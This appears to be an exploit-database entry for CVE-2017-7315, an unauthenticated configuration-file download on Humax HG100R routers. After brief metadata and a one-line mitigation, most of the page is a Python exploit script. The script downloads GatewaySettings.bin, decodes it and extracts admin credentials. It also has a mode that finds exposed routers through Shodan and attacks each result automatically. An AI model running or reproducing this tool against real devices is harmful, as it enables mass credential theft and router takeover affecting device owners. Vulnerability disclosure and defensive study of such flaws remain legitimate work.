Humax Backup file download

vendor:

Humax HG100R

by:

Gambler

9,8

CVSS

CRITICAL

Authentication Bypass

287

CWE

Product Name: Humax HG100R

Affected Version From: VER 2.0.6

Affected Version To: VER 2.0.6

Patch Exists: YES

Related CWE: CVE-2017-7315

CPE: a:humaxdigital:humax_hg100r

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: OSX Linux

2017

Humax HG100R backup file download vulnerability allows an attacker to download the configuration file without authentication. This vulnerability is due to the lack of authentication in the GatewaySettings.bin file. An attacker can exploit this vulnerability by sending a GET request to the GatewaySettings.bin file. The configuration file will be downloaded and decoded in base64 format.

Mitigation:

Authentication should be implemented for the GatewaySettings.bin file.

Source

Exploit-DB raw data:

# coding: utf-8

# Exploit Title: Humax Backup file download
# Date: 29/06/2017
# Exploit Author: gambler
# Vendor Homepage: http://humaxdigital.com
# Version: VER 2.0.6
# Tested on: OSX Linux
# CVE : CVE-2017-7315

import sys
import base64
import shodan
import requests
import subprocess

def banner():
    print '''
 ██░ ██  █    ██  ███▄ ▄███▓ ▄▄▄      ▒██   ██▒
▓██░ ██▒ ██  ▓██▒▓██▒▀█▀ ██▒▒████▄    ▒▒ █ █ ▒░
▒██▀▀██░▓██  ▒██░▓██    ▓██░▒██  ▀█▄  ░░  █   ░
░▓█ ░██ ▓▓█  ░██░▒██    ▒██ ░██▄▄▄▄██  ░ █ █ ▒
░▓█▒░██▓▒▒█████▓ ▒██▒   ░██▒ ▓█   ▓██▒▒██▒ ▒██▒
 ▒ ░░▒░▒░▒▓▒ ▒ ▒ ░ ▒░   ░  ░ ▒▒   ▓▒█░▒▒ ░ ░▓ ░
 ▒ ░▒░ ░░░▒░ ░ ░ ░  ░      ░  ▒   ▒▒ ░░░   ░▒ ░
 ░  ░░ ░ ░░░ ░ ░ ░      ░     ░   ▒    ░    ░
 ░  ░  ░   ░            ░         ░  ░ ░    ░
    '''
    print 'Description: Humax HG100R backup file download'
    print 'Software Version: VER 2.0.6'
    print 'SDK Version: 5.7.1mp1'
    print 'IPv6 Stack Version: 1.2.2'
    print 'Author: Gambler'
    print 'Vulnerability founded: 14/03/2016'
    print 'CVE: waiting'
    print

def xplHelp():
    print 'Exploit syntax error, Example:'
    print 'python xpl.py http://192.168.0.1'

def exploit(server):
    path = '/view/basic/GatewaySettings.bin'
    if not server.startswith('http'):
        server = 'http://%s' % server
    if server.endswith('/'):
        server = server[:-1]+''
    url = '%s/%s' %(server,path)
    print '[+] - Downloading configuration file and decoding'
    try:
        r = requests.get(url, stream=True,timeout=10)
        for chunk in r.iter_content(chunk_size=1024):
            if chunk:
                rawdata = r.content
        save(rawdata)
    except:
        pass

def save(rawdata):
    config = base64.b64decode(rawdata).decode('ascii','ignore').replace('^@','')
    open('config.txt', 'w').write(config)
    print '[+] - Done, file saved as config.txt'
    infos = subprocess.Popen(["strings config.txt | grep -A 1 admin"], shell=True,stdout=subprocess.PIPE).communicate()[0]
    print '[+] - Credentials found'
    print infos

def shodanSearch():
    SHODAN_API_KEY = "SHODAN_API_KEY"
    api = shodan.Shodan(SHODAN_API_KEY)
    try:
            results = api.search('Copyright © 2014 HUMAX Co., Ltd. All rights reserved.')
            print 'Results found: %s' % results['total']
            for result in results['matches']:
                    router = 'http://%s:%s' % (result['ip_str'],result['port'])
                    print router
                    exploit(router)
    except shodan.APIError, e:
            print 'Error: %s' % e


if __name__ == '__main__':

    if len(sys.argv) < 2:
        xplHelp()
        sys.exit()
    banner()
    if sys.argv[1] == 'shodan':
        shodanSearch()
    else:
        exploit(sys.argv[1])